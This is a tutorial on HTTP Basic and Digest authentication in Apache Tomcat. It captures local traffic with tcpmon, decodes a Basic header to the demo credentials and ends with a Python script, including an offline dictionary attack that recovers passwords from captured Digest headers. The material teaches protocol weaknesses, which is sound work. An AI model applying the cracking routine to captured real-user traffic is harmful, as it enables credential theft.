[Demo] Basic and Digest Authentication using Apache Tomcat server Part 2 - Looking into the transmitted password data from client to server

This is the second part of the demo on Basic and Digest Authentication using the Apache Tomcat server. In the first part we created the setup, made the necessary configurations in web.xml and Tomcat's tomcat-users.xml, exported the project as a war, deployed it into Tomcat and tested both basic and digest authentication. Here we will use a protocol analyzer to capture and analyze the actual requests and responses sent between client and server during basic and digest authentication in Apache Tomcat, and in particular to see what happens to the password on the wire.

 

Tools required

We will use tcpmon to listen to requests and responses as it is very simple and just fits our need. You can read more about it @ http://javajee.com/using-tcpmon-to-listen-to-http-requests-and-responses. You may also use wireshark which is a tool with many advanced capabilities. You can start reading about wireshark @ http://javajee.com/introduction-to-wireshark-%E2%80%93-basic-concept-installation-and-first-data-capture.

 

Configuring Tcpmon

In the first part, we had created the setup, did necessary configurations within web.xml and tomcat’s tomcat-users.xml, and finally exported it as a war, deployed it into tomcat. The url for the RestrictedServlet is http://localhost:8080/ServletSecurity/RestrictedServlet

Open tcpmon by clicking tcpmon.bat (in Windows) and enter the Listen Port # as 9090 and Target Port # as 8080 (same as in your current url), leaving the host as 127.0.0.1 (assuming you are executing on your localhost with above url), and click add.

Now a new tab will appear where you can monitor every communication sent to localhost:9090. You will now need to use a modified url with port as 9090 and tcpmon will forward it to the port 8080 along with capturing the details.

 

BASIC authentication

Run the modified url for RestrictedServlet with port as 9090 instead of 8080: http://localhost:9090/ServletSecurity/RestrictedServlet.

The client will send a plain GET request and the server will send back an HTTP/1.1 401 Unauthorized response whose WWW-Authenticate header names the authentication scheme (Basic) and the realm name.

Now the client browser will show you a popup asking for the username and password.

 

Once you enter the right username and password with correct role (admin/tomcat), then you will get the response from the servlet.

If you look at the tcpmon listen page, you can see the details sent by client and response by the server.

In the captured request I can see that the authentication scheme is Basic and that the username and password are sent in an Authorization header as a single Base64 token: YWRtaW46dG9tY2F0. Base64 is an encoding, not encryption: there is no key, and anyone who sees the header can reverse it.

I can simply go to any Base64 decoder (e.g. https://www.base64decode.org/), paste the string YWRtaW46dG9tY2F0 and decode it with a single click, and it will give me the username and password as admin:tomcat. The same decoding is done by every proxy, log collector or packet capture that sees the request, which is why Basic authentication is only acceptable over TLS.

 

DIGEST authentication

To change the authentication type from BASIC to DIGEST,

  1. Go to your deployed web application's web.xml file (e.g. <TOMCAT-INSTALL-DIR>/webapps/ServletSecurity/WEB-INF/web.xml)  

  2. Change   <auth-method>BASIC</auth-method> to   <auth-method>DIGEST</auth-method>

  3. Stop (shutdown.bat) and start (startup.bat) tomcat

 

Now close and open a new browser window (to get a new session) and execute the same url as before: http://localhost:9090/ServletSecurity/RestrictedServlet.

This will give you a popup as before asking for your credentials.

If you look at tcpmon for the request and response, you can see that the authentication method is now DIGEST instead of BASIC.

The WWW-Authenticate header will now contain some additional information as well (a server nonce, the quality-of-protection value qop and an opaque token), which the client needs in order to compute the digest.

WWW-Authenticate: Digest realm="Restricted Access", qop="auth", nonce="1429331633971:fe2a4023146da72712a100913629c721", opaque="4FE4AED73CC7D1995AF7BC84E2EB9303"

 

Once you enter the right username and password with correct role (admin/tomcat), then you will get the response from the servlet (same as with BASIC authentication).

 

However, if you look at tcpmon, you can see that the password itself is no longer sent as it was with Basic. Instead the client sends a response value, an MD5 hash computed over the username, realm, password, server nonce, request count (nc), client nonce (cnonce), qop, HTTP method and request URI. The username, on the other hand, is still sent as plain text.

Authorization header will now have value as:

Authorization: Digest username="admin", realm="Restricted Access", nonce="1429331633971:fe2a4023146da72712a100913629c721", uri="/ServletSecurity/RestrictedServlet", response="b86430e9b4d5e4c1f0abf64b566c715c", opaque="4FE4AED73CC7D1995AF7BC84E2EB9303", qop=auth, nc=00000001, cnonce="d5205f3c7acc1ecd"

 

Now you cannot recover the password from the capture by simply decoding it as we did before. This is the improvement Digest offers over Basic, but it is a limited one: every input to the hash except the password (username, realm, nonce, nc, cnonce, qop, uri and the response itself) is visible in the capture, so an attacker can recompute the response offline for candidate passwords and check for a match, and MD5 makes that cheap for weak passwords such as the one used in this demo. The server must also still hold either the password or the MD5 of username:realm:password to verify the response, and neither scheme protects the rest of the request, the response body or the session cookie. For real deployments, both Basic and Digest authentication should be used only over TLS.
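The following is an added example, not code from the original tutorial, that reproduces both captures above in Python: it decodes the Basic Authorization header, computes the Digest response exactly as RFC 2617 defines it for qop=auth (HA1 = MD5(username:realm:password), HA2 = MD5(method:uri), response = MD5(HA1:nonce:nc:cnonce:qop:HA2)) for the WWW-Authenticate challenge captured with tcpmon, and then runs an offline dictionary attack against a Digest Authorization header to recover the password. The header values are copied from the capture on this page; the word list and the cnonce used when building the test header are constructed for the example, and whether the page's own captured response cracks depends on Tomcat's digest matching the RFC 2617 MD5 computation, which is why the constructed header, not the page's, is what the example checks.

```python
import base64
import hashlib
import re

# Headers as captured with tcpmon on this page (copied from the text above).
BASIC_AUTHORIZATION = "Authorization: Basic YWRtaW46dG9tY2F0"
DIGEST_CHALLENGE = (
    'WWW-Authenticate: Digest realm="Restricted Access", qop="auth", '
    'nonce="1429331633971:fe2a4023146da72712a100913629c721", '
    'opaque="4FE4AED73CC7D1995AF7BC84E2EB9303"'
)
PAGE_DIGEST_AUTHORIZATION = (
    'Authorization: Digest username="admin", realm="Restricted Access", '
    'nonce="1429331633971:fe2a4023146da72712a100913629c721", '
    'uri="/ServletSecurity/RestrictedServlet", '
    'response="b86430e9b4d5e4c1f0abf64b566c715c", '
    'opaque="4FE4AED73CC7D1995AF7BC84E2EB9303", qop=auth, nc=00000001, '
    'cnonce="d5205f3c7acc1ecd"'
)

# Matches key="quoted value" or key=bare-value inside an auth header.
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]*))')


def parse_auth_header(header_line):
    """Split 'Name: Scheme k="v", k2=v2' into (scheme, {k: v})."""
    value = header_line.split(":", 1)[1].strip()
    scheme, _, params = value.partition(" ")
    fields = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
              for m in _PARAM_RE.finditer(params)}
    return scheme, fields


def decode_basic(header_line):
    """Recover (username, password) from a Basic Authorization header."""
    value = header_line.split(":", 1)[1].strip()
    scheme, _, token = value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic header: " + scheme)
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def _md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, password, realm, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response for qop=auth, the form Tomcat's digest challenge asks for."""
    ha1 = _md5_hex(f"{username}:{realm}:{password}")
    ha2 = _md5_hex(f"{method}:{uri}")
    return _md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def build_digest_authorization(username, password, challenge_line, method, uri,
                               cnonce, nc="00000001"):
    """What the browser sends back for the captured challenge (client side)."""
    _, ch = parse_auth_header(challenge_line)
    resp = digest_response(username, password, ch["realm"], method, uri,
                           ch["nonce"], nc, cnonce, ch["qop"])
    return ('Authorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", '
            'response="%s", opaque="%s", qop=%s, nc=%s, cnonce="%s"'
            % (username, ch["realm"], ch["nonce"], uri, resp, ch["opaque"],
               ch["qop"], nc, cnonce))


def crack_digest(authorization_line, method, candidates):
    """Offline dictionary attack: everything but the password is in the capture."""
    scheme, p = parse_auth_header(authorization_line)
    if scheme != "Digest":
        raise ValueError("not a Digest header: " + scheme)
    for pw in candidates:
        guess = digest_response(p["username"], pw, p["realm"], method, p["uri"],
                                p["nonce"], p["nc"], p["cnonce"], p["qop"])
        if guess == p["response"]:
            return pw
    return None


if __name__ == "__main__":
    # Constructed word list for the demonstration.
    wordlist = ["password", "admin", "123456", "tomcat"]
    print("Basic:", decode_basic(BASIC_AUTHORIZATION))
    built = build_digest_authorization("admin", "tomcat", DIGEST_CHALLENGE, "GET",
                                       "/ServletSecurity/RestrictedServlet",
                                       cnonce="d5205f3c7acc1ecd")
    print("Digest (constructed header) cracks to:", crack_digest(built, "GET", wordlist))
    print("Digest (page's captured header) cracks to:",
          crack_digest(PAGE_DIGEST_AUTHORIZATION, "GET", wordlist))
```

The decoding step for Basic needs nothing beyond base64, which is the whole point of the first capture. For Digest, crack_digest uses only fields present in the Authorization header plus the request method, so a single captured request is enough for an offline attack; the cost per guess is three MD5 operations, and the nonce does nothing to slow it down because it is fixed for the captured exchange.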
